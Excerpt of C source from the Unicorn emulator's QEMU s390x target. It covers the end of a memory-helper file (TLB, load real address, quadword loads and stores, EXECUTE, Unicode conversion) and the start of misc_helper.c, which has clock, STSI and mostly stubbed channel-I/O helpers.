void HELPER(ptlb)(CPUS390XState *env) { tlb_flush(env_cpu(env)); } /* flush global tlb */ void HELPER(purge)(CPUS390XState *env) { tlb_flush_all_cpus_synced(env_cpu(env)); } /* load real address */ uint64_t HELPER(lra)(CPUS390XState *env, uint64_t addr) { uint64_t asc = env->psw.mask & PSW_MASK_ASC; uint64_t ret, tec; int flags, exc, cc; /* XXX incomplete - has more corner cases */ if (!(env->psw.mask & PSW_MASK_64) && (addr >> 32)) { tcg_s390_program_interrupt(env, PGM_SPECIAL_OP, GETPC()); } exc = mmu_translate(env, addr, 0, asc, &ret, &flags, &tec); if (exc) { cc = 3; ret = exc | 0x80000000; } else { cc = 0; ret |= addr & ~TARGET_PAGE_MASK; } env->cc_op = cc; return ret; } /* load pair from quadword */ uint64_t HELPER(lpq)(CPUS390XState *env, uint64_t addr) { uintptr_t ra = GETPC(); uint64_t hi, lo; check_alignment(env, addr, 16, ra); hi = cpu_ldq_data_ra(env, addr + 0, ra); lo = cpu_ldq_data_ra(env, addr + 8, ra); env->retxl = lo; return hi; } uint64_t HELPER(lpq_parallel)(CPUS390XState *env, uint64_t addr) { uintptr_t ra = GETPC(); uint64_t hi, lo; int mem_idx; TCGMemOpIdx oi; Int128 v; assert(HAVE_ATOMIC128); mem_idx = cpu_mmu_index(env, false); oi = make_memop_idx(MO_TEQ | MO_ALIGN_16, mem_idx); v = helper_atomic_ldo_be_mmu(env, addr, oi, ra); hi = int128_gethi(v); lo = int128_getlo(v); env->retxl = lo; return hi; } /* store pair to quadword */ void HELPER(stpq)(CPUS390XState *env, uint64_t addr, uint64_t low, uint64_t high) { uintptr_t ra = GETPC(); check_alignment(env, addr, 16, ra); cpu_stq_data_ra(env, addr + 0, high, ra); cpu_stq_data_ra(env, addr + 8, low, ra); } void HELPER(stpq_parallel)(CPUS390XState *env, uint64_t addr, uint64_t low, uint64_t high) { uintptr_t ra = GETPC(); int mem_idx; TCGMemOpIdx oi; Int128 v; assert(HAVE_ATOMIC128); mem_idx = cpu_mmu_index(env, false); oi = make_memop_idx(MO_TEQ | MO_ALIGN_16, mem_idx); v = int128_make128(low, high); helper_atomic_sto_be_mmu(env, addr, v, oi, ra); } /* Execute instruction. This instruction executes an insn modified with the contents of r1. It does not change the executed instruction in memory; it does not change the program counter. Perform this by recording the modified instruction in env->ex_value. This will be noticed by cpu_get_tb_cpu_state and thus tb translation. */ void HELPER(ex)(CPUS390XState *env, uint32_t ilen, uint64_t r1, uint64_t addr) { uint64_t insn = cpu_lduw_code(env, addr); uint8_t opc = insn >> 8; /* Or in the contents of R1[56:63]. */ insn |= r1 & 0xff; /* Load the rest of the instruction. */ insn <<= 48; switch (get_ilen(opc)) { case 2: break; case 4: insn |= (uint64_t)cpu_lduw_code(env, addr + 2) << 32; break; case 6: insn |= (uint64_t)(uint32_t)cpu_ldl_code(env, addr + 2) << 16; break; default: g_assert_not_reached(); } /* The very most common cases can be sped up by avoiding a new TB. */ if ((opc & 0xf0) == 0xd0) { typedef uint32_t (*dx_helper)(CPUS390XState *, uint32_t, uint64_t, uint64_t, uintptr_t); static const dx_helper dx[16] = { [0x0] = do_helper_trt_bkwd, [0x2] = do_helper_mvc, [0x4] = do_helper_nc, [0x5] = do_helper_clc, [0x6] = do_helper_oc, [0x7] = do_helper_xc, [0xc] = do_helper_tr, [0xd] = do_helper_trt_fwd, }; dx_helper helper = dx[opc & 0xf]; if (helper) { uint32_t l = extract64(insn, 48, 8); uint32_t b1 = extract64(insn, 44, 4); uint32_t d1 = extract64(insn, 32, 12); uint32_t b2 = extract64(insn, 28, 4); uint32_t d2 = extract64(insn, 16, 12); uint64_t a1 = wrap_address(env, env->regs[b1] + d1); uint64_t a2 = wrap_address(env, env->regs[b2] + d2); env->cc_op = helper(env, l, a1, a2, 0); env->psw.addr += ilen; return; } } else if (opc == 0x0a) { env->int_svc_code = extract64(insn, 48, 8); env->int_svc_ilen = ilen; helper_exception(env, EXCP_SVC); g_assert_not_reached(); } /* Record the insn we want to execute as well as the ilen to use during the execution of the target insn. This will also ensure that ex_value is non-zero, which flags that we are in a state that requires such execution. */ env->ex_value = insn | ilen; } uint32_t HELPER(mvcos)(CPUS390XState *env, uint64_t dest, uint64_t src, uint64_t len) { const uint8_t psw_key = (env->psw.mask & PSW_MASK_KEY) >> PSW_SHIFT_KEY; const uint8_t psw_as = (env->psw.mask & PSW_MASK_ASC) >> PSW_SHIFT_ASC; const uint64_t r0 = env->regs[0]; const uintptr_t ra = GETPC(); uint8_t dest_key, dest_as, dest_k, dest_a; uint8_t src_key, src_as, src_k, src_a; uint64_t val; int cc = 0; HELPER_LOG("%s dest %" PRIx64 ", src %" PRIx64 ", len %" PRIx64 "\n", __func__, dest, src, len); if (!(env->psw.mask & PSW_MASK_DAT)) { tcg_s390_program_interrupt(env, PGM_SPECIAL_OP, ra); } /* OAC (operand access control) for the first operand -> dest */ val = (r0 & 0xffff0000ULL) >> 16; dest_key = (val >> 12) & 0xf; dest_as = (val >> 6) & 0x3; dest_k = (val >> 1) & 0x1; dest_a = val & 0x1; /* OAC (operand access control) for the second operand -> src */ val = (r0 & 0x0000ffffULL); src_key = (val >> 12) & 0xf; src_as = (val >> 6) & 0x3; src_k = (val >> 1) & 0x1; src_a = val & 0x1; if (!dest_k) { dest_key = psw_key; } if (!src_k) { src_key = psw_key; } if (!dest_a) { dest_as = psw_as; } if (!src_a) { src_as = psw_as; } if (dest_a && dest_as == AS_HOME && (env->psw.mask & PSW_MASK_PSTATE)) { tcg_s390_program_interrupt(env, PGM_SPECIAL_OP, ra); } if (!(env->cregs[0] & CR0_SECONDARY) && (dest_as == AS_SECONDARY || src_as == AS_SECONDARY)) { tcg_s390_program_interrupt(env, PGM_SPECIAL_OP, ra); } if (!psw_key_valid(env, dest_key) || !psw_key_valid(env, src_key)) { tcg_s390_program_interrupt(env, PGM_PRIVILEGED, ra); } len = wrap_length32(env, len); if (len > 4096) { cc = 3; len = 4096; } /* FIXME: AR-mode and proper problem state mode (using PSW keys) missing */ if (src_as == AS_ACCREG || dest_as == AS_ACCREG || (env->psw.mask & PSW_MASK_PSTATE)) { qemu_log_mask(LOG_UNIMP, "%s: AR-mode and PSTATE support missing\n", __func__); tcg_s390_program_interrupt(env, PGM_ADDRESSING, ra); } /* FIXME: Access using correct keys and AR-mode */ if (len) { S390Access srca = access_prepare(env, src, len, MMU_DATA_LOAD, mmu_idx_from_as(src_as), ra); S390Access desta = access_prepare(env, dest, len, MMU_DATA_STORE, mmu_idx_from_as(dest_as), ra); access_memmove(env, &desta, &srca, ra); } return cc; } /* Decode a Unicode character. A return value < 0 indicates success, storing the UTF-32 result into OCHAR and the input length into OLEN. A return value >= 0 indicates failure, and the CC value to be returned. */ typedef int (*decode_unicode_fn)(CPUS390XState *env, uint64_t addr, uint64_t ilen, bool enh_check, uintptr_t ra, uint32_t *ochar, uint32_t *olen); /* Encode a Unicode character. A return value < 0 indicates success, storing the bytes into ADDR and the output length into OLEN. A return value >= 0 indicates failure, and the CC value to be returned. */ typedef int (*encode_unicode_fn)(CPUS390XState *env, uint64_t addr, uint64_t ilen, uintptr_t ra, uint32_t c, uint32_t *olen); static int decode_utf8(CPUS390XState *env, uint64_t addr, uint64_t ilen, bool enh_check, uintptr_t ra, uint32_t *ochar, uint32_t *olen) { uint8_t s0, s1, s2, s3; uint32_t c, l; if (ilen < 1) { return 0; } s0 = cpu_ldub_data_ra(env, addr, ra); if (s0 <= 0x7f) { /* one byte character */ l = 1; c = s0; } else if (s0 <= (enh_check ? 0xc1 : 0xbf)) { /* invalid character */ return 2; } else if (s0 <= 0xdf) { /* two byte character */ l = 2; if (ilen < 2) { return 0; } s1 = cpu_ldub_data_ra(env, addr + 1, ra); c = s0 & 0x1f; c = (c << 6) | (s1 & 0x3f); if (enh_check && (s1 & 0xc0) != 0x80) { return 2; } } else if (s0 <= 0xef) { /* three byte character */ l = 3; if (ilen < 3) { return 0; } s1 = cpu_ldub_data_ra(env, addr + 1, ra); s2 = cpu_ldub_data_ra(env, addr + 2, ra); c = s0 & 0x0f; c = (c << 6) | (s1 & 0x3f); c = (c << 6) | (s2 & 0x3f); /* Fold the byte-by-byte range descriptions in the PoO into tests against the complete value. It disallows encodings that could be smaller, and the UTF-16 surrogates. */ if (enh_check && ((s1 & 0xc0) != 0x80 || (s2 & 0xc0) != 0x80 || c < 0x1000 || (c >= 0xd800 && c <= 0xdfff))) { return 2; } } else if (s0 <= (enh_check ? 0xf4 : 0xf7)) { /* four byte character */ l = 4; if (ilen < 4) { return 0; } s1 = cpu_ldub_data_ra(env, addr + 1, ra); s2 = cpu_ldub_data_ra(env, addr + 2, ra); s3 = cpu_ldub_data_ra(env, addr + 3, ra); c = s0 & 0x07; c = (c << 6) | (s1 & 0x3f); c = (c << 6) | (s2 & 0x3f); c = (c << 6) | (s3 & 0x3f); /* See above. */ if (enh_check && ((s1 & 0xc0) != 0x80 || (s2 & 0xc0) != 0x80 || (s3 & 0xc0) != 0x80 || c < 0x010000 || c > 0x10ffff)) { return 2; } } else { /* invalid character */ return 2; } *ochar = c; *olen = l; return -1; } static int decode_utf16(CPUS390XState *env, uint64_t addr, uint64_t ilen, bool enh_check, uintptr_t ra, uint32_t *ochar, uint32_t *olen) { uint16_t s0, s1; uint32_t c, l; if (ilen < 2) { return 0; } s0 = cpu_lduw_data_ra(env, addr, ra); if ((s0 & 0xfc00) != 0xd800) { /* one word character */ l = 2; c = s0; } else { /* two word character */ l = 4; if (ilen < 4) { return 0; } s1 = cpu_lduw_data_ra(env, addr + 2, ra); c = extract32(s0, 6, 4) + 1; c = (c << 6) | (s0 & 0x3f); c = (c << 10) | (s1 & 0x3ff); if (enh_check && (s1 & 0xfc00) != 0xdc00) { /* invalid surrogate character */ return 2; } } *ochar = c; *olen = l; return -1; } static int decode_utf32(CPUS390XState *env, uint64_t addr, uint64_t ilen, bool enh_check, uintptr_t ra, uint32_t *ochar, uint32_t *olen) { uint32_t c; if (ilen < 4) { return 0; } c = cpu_ldl_data_ra(env, addr, ra); if ((c >= 0xd800 && c <= 0xdbff) || c > 0x10ffff) { /* invalid unicode character */ return 2; } *ochar = c; *olen = 4; return -1; } static int encode_utf8(CPUS390XState *env, uint64_t addr, uint64_t ilen, uintptr_t ra, uint32_t c, uint32_t *olen) { uint8_t d[4]; uint32_t l, i; if (c <= 0x7f) { /* one byte character */ l = 1; d[0] = c; } else if (c <= 0x7ff) { /* two byte character */ l = 2; d[1] = 0x80 | extract32(c, 0, 6); d[0] = 0xc0 | extract32(c, 6, 5); } else if (c <= 0xffff) { /* three byte character */ l = 3; d[2] = 0x80 | extract32(c, 0, 6); d[1] = 0x80 | extract32(c, 6, 6); d[0] = 0xe0 | extract32(c, 12, 4); } else { /* four byte character */ l = 4; d[3] = 0x80 | extract32(c, 0, 6); d[2] = 0x80 | extract32(c, 6, 6); d[1] = 0x80 | extract32(c, 12, 6); d[0] = 0xf0 | extract32(c, 18, 3); } if (ilen < l) { return 1; } for (i = 0; i < l; ++i) { cpu_stb_data_ra(env, addr + i, d[i], ra); } *olen = l; return -1; } static int encode_utf16(CPUS390XState *env, uint64_t addr, uint64_t ilen, uintptr_t ra, uint32_t c, uint32_t *olen) { uint16_t d0, d1; if (c <= 0xffff) { /* one word character */ if (ilen < 2) { return 1; } cpu_stw_data_ra(env, addr, c, ra); *olen = 2; } else { /* two word character */ if (ilen < 4) { return 1; } d1 = 0xdc00 | extract32(c, 0, 10); d0 = 0xd800 | extract32(c, 10, 6); d0 = deposit32(d0, 6, 4, extract32(c, 16, 5) - 1); cpu_stw_data_ra(env, addr + 0, d0, ra); cpu_stw_data_ra(env, addr + 2, d1, ra); *olen = 4; } return -1; } static int encode_utf32(CPUS390XState *env, uint64_t addr, uint64_t ilen, uintptr_t ra, uint32_t c, uint32_t *olen) { if (ilen < 4) { return 1; } cpu_stl_data_ra(env, addr, c, ra); *olen = 4; return -1; } static inline uint32_t convert_unicode(CPUS390XState *env, uint32_t r1, uint32_t r2, uint32_t m3, uintptr_t ra, decode_unicode_fn decode, encode_unicode_fn encode) { uint64_t dst = get_address(env, r1); uint64_t dlen = get_length(env, r1 + 1); uint64_t src = get_address(env, r2); uint64_t slen = get_length(env, r2 + 1); bool enh_check = m3 & 1; int cc, i; /* Lest we fail to service interrupts in a timely manner, limit the amount of work we're willing to do. For now, let's cap at 256. */ for (i = 0; i < 256; ++i) { uint32_t c, ilen, olen; cc = decode(env, src, slen, enh_check, ra, &c, &ilen); if (unlikely(cc >= 0)) { break; } cc = encode(env, dst, dlen, ra, c, &olen); if (unlikely(cc >= 0)) { break; } src += ilen; slen -= ilen; dst += olen; dlen -= olen; cc = 3; } set_address(env, r1, dst); set_length(env, r1 + 1, dlen); set_address(env, r2, src); set_length(env, r2 + 1, slen); return cc; } uint32_t HELPER(cu12)(CPUS390XState *env, uint32_t r1, uint32_t r2, uint32_t m3) { return convert_unicode(env, r1, r2, m3, GETPC(), decode_utf8, encode_utf16); } uint32_t HELPER(cu14)(CPUS390XState *env, uint32_t r1, uint32_t r2, uint32_t m3) { return convert_unicode(env, r1, r2, m3, GETPC(), decode_utf8, encode_utf32); } uint32_t HELPER(cu21)(CPUS390XState *env, uint32_t r1, uint32_t r2, uint32_t m3) { return convert_unicode(env, r1, r2, m3, GETPC(), decode_utf16, encode_utf8); } uint32_t HELPER(cu24)(CPUS390XState *env, uint32_t r1, uint32_t r2, uint32_t m3) { return convert_unicode(env, r1, r2, m3, GETPC(), decode_utf16, encode_utf32); } uint32_t HELPER(cu41)(CPUS390XState *env, uint32_t r1, uint32_t r2, uint32_t m3) { return convert_unicode(env, r1, r2, m3, GETPC(), decode_utf32, encode_utf8); } uint32_t HELPER(cu42)(CPUS390XState *env, uint32_t r1, uint32_t r2, uint32_t m3) { return convert_unicode(env, r1, r2, m3, GETPC(), decode_utf32, encode_utf16); } void probe_write_access(CPUS390XState *env, uint64_t addr, uint64_t len, uintptr_t ra) { /* test the actual access, not just any access to the page due to LAP */ while (len) { const uint64_t pagelen = -(addr | TARGET_PAGE_MASK); const uint64_t curlen = MIN(pagelen, len); probe_write(env, addr, curlen, cpu_mmu_index(env, false), ra); addr = wrap_address(env, addr + curlen); len -= curlen; } } void HELPER(probe_write_access)(CPUS390XState *env, uint64_t addr, uint64_t len) { probe_write_access(env, addr, len, GETPC()); } ���������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/s390x/misc_helper.c�������������������������������������������������������0000664�0000000�0000000�00000053475�14675241067�0021003�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * S/390 misc helper routines * * Copyright (c) 2009 Ulrich Hecht * Copyright (c) 2009 Alexander Graf * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include "cpu.h" #include "internal.h" #include "exec/memory.h" #include "qemu/host-utils.h" #include "exec/helper-proto.h" #include "qemu/timer.h" #include "exec/exec-all.h" #include "exec/cpu_ldst.h" #include "tcg_s390x.h" #include "s390-tod.h" #include "sysemu/cpus.h" #include "sysemu/sysemu.h" #include "hw/s390x/ebcdic.h" //#include "hw/s390x/sclp.h" //#include "hw/s390x/s390_flic.h" #include "hw/s390x/ioinst.h" //#include "hw/s390x/s390-pci-inst.h" //#include "hw/s390x/tod.h" /* #define DEBUG_HELPER */ #ifdef DEBUG_HELPER #define HELPER_LOG(x, ...) qemu_log(x) #else #define HELPER_LOG(x, ...) #endif /* Raise an exception statically from a TB. */ void HELPER(exception)(CPUS390XState *env, uint32_t excp) { CPUState *cs = env_cpu(env); HELPER_LOG("%s: exception %d\n", __func__, excp); cs->exception_index = excp; cpu_loop_exit(cs); } /* Store CPU Timer (also used for EXTRACT CPU TIME) */ uint64_t HELPER(stpt)(CPUS390XState *env) { return time2tod(env->cputm - qemu_clock_get_ns(QEMU_CLOCK_VIRTUAL)); } /* Store Clock */ uint64_t HELPER(stck)(CPUS390XState *env) { #if 0 S390TODState *td = s390_get_todstate(); S390TODClass *tdc = S390_TOD_GET_CLASS(td); S390TOD tod; tdc->get(td, &tod, &error_abort); return tod.low; #endif return 0; } /* SCLP service call */ uint32_t HELPER(servc)(CPUS390XState *env, uint64_t r1, uint64_t r2) { #if 0 qemu_mutex_lock_iothread(); int r = sclp_service_call(env, r1, r2); qemu_mutex_unlock_iothread(); if (r < 0) { tcg_s390_program_interrupt(env, -r, GETPC()); } return r; #endif return 0; } void HELPER(diag)(CPUS390XState *env, uint32_t r1, uint32_t r3, uint32_t num) { #if 0 uint64_t r; switch (num) { case 0x500: /* KVM hypercall */ qemu_mutex_lock_iothread(); r = s390_virtio_hypercall(env); qemu_mutex_unlock_iothread(); break; case 0x44: /* yield */ r = 0; break; case 0x308: /* ipl */ qemu_mutex_lock_iothread(); handle_diag_308(env, r1, r3, GETPC()); qemu_mutex_unlock_iothread(); r = 0; break; case 0x288: /* time bomb (watchdog) */ r = handle_diag_288(env, r1, r3); break; default: r = -1; break; } if (r) { tcg_s390_program_interrupt(env, PGM_SPECIFICATION, GETPC()); } #endif } /* Set Prefix */ void HELPER(spx)(CPUS390XState *env, uint64_t a1) { CPUState *cs = env_cpu(env); uint32_t prefix = a1 & 0x7fffe000; env->psa = prefix; HELPER_LOG("prefix: %#x\n", prefix); tlb_flush_page(cs, 0); tlb_flush_page(cs, TARGET_PAGE_SIZE); } static void update_ckc_timer(CPUS390XState *env) { #if 0 S390TODState *td = s390_get_todstate(); uint64_t time; /* stop the timer and remove pending CKC IRQs */ timer_del(env->tod_timer); g_assert(qemu_mutex_iothread_locked()); env->pending_int &= ~INTERRUPT_EXT_CLOCK_COMPARATOR; /* the tod has to exceed the ckc, this can never happen if ckc is all 1's */ if (env->ckc == -1ULL) { return; } /* difference between origins */ time = env->ckc - td->base.low; /* nanoseconds */ time = tod2time(time); timer_mod(env->tod_timer, time); #endif } /* Set Clock Comparator */ void HELPER(sckc)(CPUS390XState *env, uint64_t ckc) { #if 0 env->ckc = ckc; qemu_mutex_lock_iothread(); update_ckc_timer(env); qemu_mutex_unlock_iothread(); #endif } void tcg_s390_tod_updated(CPUState *cs, run_on_cpu_data opaque) { S390CPU *cpu = S390_CPU(cs); update_ckc_timer(&cpu->env); } /* Set Clock */ uint32_t HELPER(sck)(CPUS390XState *env, uint64_t tod_low) { #if 0 S390TODState *td = s390_get_todstate(); S390TODClass *tdc = S390_TOD_GET_CLASS(td); S390TOD tod = { .high = 0, .low = tod_low, }; qemu_mutex_lock_iothread(); tdc->set(td, &tod, &error_abort); qemu_mutex_unlock_iothread(); #endif return 0; } /* Set Tod Programmable Field */ void HELPER(sckpf)(CPUS390XState *env, uint64_t r0) { uint32_t val = r0; if (val & 0xffff0000) { tcg_s390_program_interrupt(env, PGM_SPECIFICATION, GETPC()); } env->todpr = val; } /* Store Clock Comparator */ uint64_t HELPER(stckc)(CPUS390XState *env) { return env->ckc; } /* Set CPU Timer */ void HELPER(spt)(CPUS390XState *env, uint64_t time) { if (time == -1ULL) { return; } /* nanoseconds */ time = tod2time(time); env->cputm = qemu_clock_get_ns(QEMU_CLOCK_VIRTUAL) + time; // timer_mod(env->cpu_timer, env->cputm); } /* Store System Information */ uint32_t HELPER(stsi)(CPUS390XState *env, uint64_t a0, uint64_t r0, uint64_t r1) { #if 0 const uintptr_t ra = GETPC(); const uint32_t sel1 = r0 & STSI_R0_SEL1_MASK; const uint32_t sel2 = r1 & STSI_R1_SEL2_MASK; const MachineState *ms = MACHINE(qdev_get_machine()); uint16_t total_cpus = 0, conf_cpus = 0, reserved_cpus = 0; S390CPU *cpu = env_archcpu(env); SysIB sysib = { }; int i, cc = 0; if ((r0 & STSI_R0_FC_MASK) > STSI_R0_FC_LEVEL_3) { /* invalid function code: no other checks are performed */ return 3; } if ((r0 & STSI_R0_RESERVED_MASK) || (r1 & STSI_R1_RESERVED_MASK)) { tcg_s390_program_interrupt(env, PGM_SPECIFICATION, ra); } if ((r0 & STSI_R0_FC_MASK) == STSI_R0_FC_CURRENT) { /* query the current level: no further checks are performed */ env->regs[0] = STSI_R0_FC_LEVEL_3; return 0; } if (a0 & ~TARGET_PAGE_MASK) { tcg_s390_program_interrupt(env, PGM_SPECIFICATION, ra); } /* count the cpus and split them into configured and reserved ones */ for (i = 0; i < ms->possible_cpus->len; i++) { total_cpus++; if (ms->possible_cpus->cpus[i].cpu) { conf_cpus++; } else { reserved_cpus++; } } /* * In theory, we could report Level 1 / Level 2 as current. However, * the Linux kernel will detect this as running under LPAR and assume * that we have a sclp linemode console (which is always present on * LPAR, but not the default for QEMU), therefore not displaying boot * messages and making booting a Linux kernel under TCG harder. * * For now we fake the same SMP configuration on all levels. * * TODO: We could later make the level configurable via the machine * and change defaults (linemode console) based on machine type * and accelerator. */ switch (r0 & STSI_R0_FC_MASK) { case STSI_R0_FC_LEVEL_1: if ((sel1 == 1) && (sel2 == 1)) { /* Basic Machine Configuration */ char type[5] = {}; ebcdic_put(sysib.sysib_111.manuf, "QEMU ", 16); /* same as machine type number in STORE CPU ID, but in EBCDIC */ snprintf(type, ARRAY_SIZE(type), "%X", cpu->model->def->type); ebcdic_put(sysib.sysib_111.type, type, 4); /* model number (not stored in STORE CPU ID for z/Architecure) */ ebcdic_put(sysib.sysib_111.model, "QEMU ", 16); ebcdic_put(sysib.sysib_111.sequence, "QEMU ", 16); ebcdic_put(sysib.sysib_111.plant, "QEMU", 4); } else if ((sel1 == 2) && (sel2 == 1)) { /* Basic Machine CPU */ ebcdic_put(sysib.sysib_121.sequence, "QEMUQEMUQEMUQEMU", 16); ebcdic_put(sysib.sysib_121.plant, "QEMU", 4); sysib.sysib_121.cpu_addr = cpu_to_be16(env->core_id); } else if ((sel1 == 2) && (sel2 == 2)) { /* Basic Machine CPUs */ sysib.sysib_122.capability = cpu_to_be32(0x443afc29); sysib.sysib_122.total_cpus = cpu_to_be16(total_cpus); sysib.sysib_122.conf_cpus = cpu_to_be16(conf_cpus); sysib.sysib_122.reserved_cpus = cpu_to_be16(reserved_cpus); } else { cc = 3; } break; case STSI_R0_FC_LEVEL_2: if ((sel1 == 2) && (sel2 == 1)) { /* LPAR CPU */ ebcdic_put(sysib.sysib_221.sequence, "QEMUQEMUQEMUQEMU", 16); ebcdic_put(sysib.sysib_221.plant, "QEMU", 4); sysib.sysib_221.cpu_addr = cpu_to_be16(env->core_id); } else if ((sel1 == 2) && (sel2 == 2)) { /* LPAR CPUs */ sysib.sysib_222.lcpuc = 0x80; /* dedicated */ sysib.sysib_222.total_cpus = cpu_to_be16(total_cpus); sysib.sysib_222.conf_cpus = cpu_to_be16(conf_cpus); sysib.sysib_222.reserved_cpus = cpu_to_be16(reserved_cpus); ebcdic_put(sysib.sysib_222.name, "QEMU ", 8); sysib.sysib_222.caf = cpu_to_be32(1000); sysib.sysib_222.dedicated_cpus = cpu_to_be16(conf_cpus); } else { cc = 3; } break; case STSI_R0_FC_LEVEL_3: if ((sel1 == 2) && (sel2 == 2)) { /* VM CPUs */ sysib.sysib_322.count = 1; sysib.sysib_322.vm[0].total_cpus = cpu_to_be16(total_cpus); sysib.sysib_322.vm[0].conf_cpus = cpu_to_be16(conf_cpus); sysib.sysib_322.vm[0].reserved_cpus = cpu_to_be16(reserved_cpus); sysib.sysib_322.vm[0].caf = cpu_to_be32(1000); /* Linux kernel uses this to distinguish us from z/VM */ ebcdic_put(sysib.sysib_322.vm[0].cpi, "KVM/Linux ", 16); sysib.sysib_322.vm[0].ext_name_encoding = 2; /* UTF-8 */ /* If our VM has a name, use the real name */ if (qemu_name) { memset(sysib.sysib_322.vm[0].name, 0x40, sizeof(sysib.sysib_322.vm[0].name)); ebcdic_put(sysib.sysib_322.vm[0].name, qemu_name, MIN(sizeof(sysib.sysib_322.vm[0].name), strlen(qemu_name))); strncpy((char *)sysib.sysib_322.ext_names[0], qemu_name, sizeof(sysib.sysib_322.ext_names[0])); } else { ebcdic_put(sysib.sysib_322.vm[0].name, "TCGguest", 8); strcpy((char *)sysib.sysib_322.ext_names[0], "TCGguest"); } /* add the uuid */ memcpy(sysib.sysib_322.vm[0].uuid, &qemu_uuid, sizeof(sysib.sysib_322.vm[0].uuid)); } else { cc = 3; } break; } if (cc == 0) { if (s390_cpu_virt_mem_write(cpu, a0, 0, &sysib, sizeof(sysib))) { s390_cpu_virt_mem_handle_exc(cpu, ra); } } return cc; #endif return 0; } uint32_t HELPER(sigp)(CPUS390XState *env, uint64_t order_code, uint32_t r1, uint32_t r3) { #if 0 int cc; /* TODO: needed to inject interrupts - push further down */ qemu_mutex_lock_iothread(); cc = handle_sigp(env, order_code & SIGP_ORDER_MASK, r1, r3); qemu_mutex_unlock_iothread(); return cc; #endif return 0; } void HELPER(xsch)(CPUS390XState *env, uint64_t r1) { #if 0 S390CPU *cpu = env_archcpu(env); qemu_mutex_lock_iothread(); ioinst_handle_xsch(cpu, r1, GETPC()); qemu_mutex_unlock_iothread(); #endif } void HELPER(csch)(CPUS390XState *env, uint64_t r1) { #if 0 S390CPU *cpu = env_archcpu(env); qemu_mutex_lock_iothread(); ioinst_handle_csch(cpu, r1, GETPC()); qemu_mutex_unlock_iothread(); #endif } void HELPER(hsch)(CPUS390XState *env, uint64_t r1) { #if 0 S390CPU *cpu = env_archcpu(env); qemu_mutex_lock_iothread(); ioinst_handle_hsch(cpu, r1, GETPC()); qemu_mutex_unlock_iothread(); #endif } void HELPER(msch)(CPUS390XState *env, uint64_t r1, uint64_t inst) { #if 0 S390CPU *cpu = env_archcpu(env); qemu_mutex_lock_iothread(); ioinst_handle_msch(cpu, r1, inst >> 16, GETPC()); qemu_mutex_unlock_iothread(); #endif } void HELPER(rchp)(CPUS390XState *env, uint64_t r1) { #if 0 S390CPU *cpu = env_archcpu(env); qemu_mutex_lock_iothread(); ioinst_handle_rchp(cpu, r1, GETPC()); qemu_mutex_unlock_iothread(); #endif } void HELPER(rsch)(CPUS390XState *env, uint64_t r1) { #if 0 S390CPU *cpu = env_archcpu(env); qemu_mutex_lock_iothread(); ioinst_handle_rsch(cpu, r1, GETPC()); qemu_mutex_unlock_iothread(); #endif } void HELPER(sal)(CPUS390XState *env, uint64_t r1) { #if 0 S390CPU *cpu = env_archcpu(env); qemu_mutex_lock_iothread(); ioinst_handle_sal(cpu, r1, GETPC()); qemu_mutex_unlock_iothread(); #endif } void HELPER(schm)(CPUS390XState *env, uint64_t r1, uint64_t r2, uint64_t inst) { #if 0 S390CPU *cpu = env_archcpu(env); qemu_mutex_lock_iothread(); ioinst_handle_schm(cpu, r1, r2, inst >> 16, GETPC()); qemu_mutex_unlock_iothread(); #endif } void HELPER(ssch)(CPUS390XState *env, uint64_t r1, uint64_t inst) { #if 0 S390CPU *cpu = env_archcpu(env); qemu_mutex_lock_iothread(); ioinst_handle_ssch(cpu, r1, inst >> 16, GETPC()); qemu_mutex_unlock_iothread(); #endif } void HELPER(stcrw)(CPUS390XState *env, uint64_t inst) { #if 0 S390CPU *cpu = env_archcpu(env); qemu_mutex_lock_iothread(); ioinst_handle_stcrw(cpu, inst >> 16, GETPC()); qemu_mutex_unlock_iothread(); #endif } void HELPER(stsch)(CPUS390XState *env, uint64_t r1, uint64_t inst) { #if 0 S390CPU *cpu = env_archcpu(env); qemu_mutex_lock_iothread(); ioinst_handle_stsch(cpu, r1, inst >> 16, GETPC()); qemu_mutex_unlock_iothread(); #endif } uint32_t HELPER(tpi)(CPUS390XState *env, uint64_t addr) { #if 0 const uintptr_t ra = GETPC(); S390CPU *cpu = env_archcpu(env); QEMUS390FLICState *flic = s390_get_qemu_flic(s390_get_flic()); QEMUS390FlicIO *io = NULL; LowCore *lowcore; if (addr & 0x3) { tcg_s390_program_interrupt(env, PGM_SPECIFICATION, ra); } qemu_mutex_lock_iothread(); io = qemu_s390_flic_dequeue_io(flic, env->cregs[6]); if (!io) { qemu_mutex_unlock_iothread(); return 0; } if (addr) { struct { uint16_t id; uint16_t nr; uint32_t parm; } intc = { .id = cpu_to_be16(io->id), .nr = cpu_to_be16(io->nr), .parm = cpu_to_be32(io->parm), }; if (s390_cpu_virt_mem_write(cpu, addr, 0, &intc, sizeof(intc))) { /* writing failed, reinject and properly clean up */ s390_io_interrupt(io->id, io->nr, io->parm, io->word); qemu_mutex_unlock_iothread(); g_free(io); s390_cpu_virt_mem_handle_exc(cpu, ra); return 0; } } else { /* no protection applies */ lowcore = cpu_map_lowcore(env); lowcore->subchannel_id = cpu_to_be16(io->id); lowcore->subchannel_nr = cpu_to_be16(io->nr); lowcore->io_int_parm = cpu_to_be32(io->parm); lowcore->io_int_word = cpu_to_be32(io->word); cpu_unmap_lowcore(env, lowcore); } g_free(io); qemu_mutex_unlock_iothread(); #endif return 1; } void HELPER(tsch)(CPUS390XState *env, uint64_t r1, uint64_t inst) { #if 0 S390CPU *cpu = env_archcpu(env); qemu_mutex_lock_iothread(); ioinst_handle_tsch(cpu, r1, inst >> 16, GETPC()); qemu_mutex_unlock_iothread(); #endif } void HELPER(chsc)(CPUS390XState *env, uint64_t inst) { #if 0 S390CPU *cpu = env_archcpu(env); qemu_mutex_lock_iothread(); ioinst_handle_chsc(cpu, inst >> 16, GETPC()); qemu_mutex_unlock_iothread(); #endif } void HELPER(per_check_exception)(CPUS390XState *env) { if 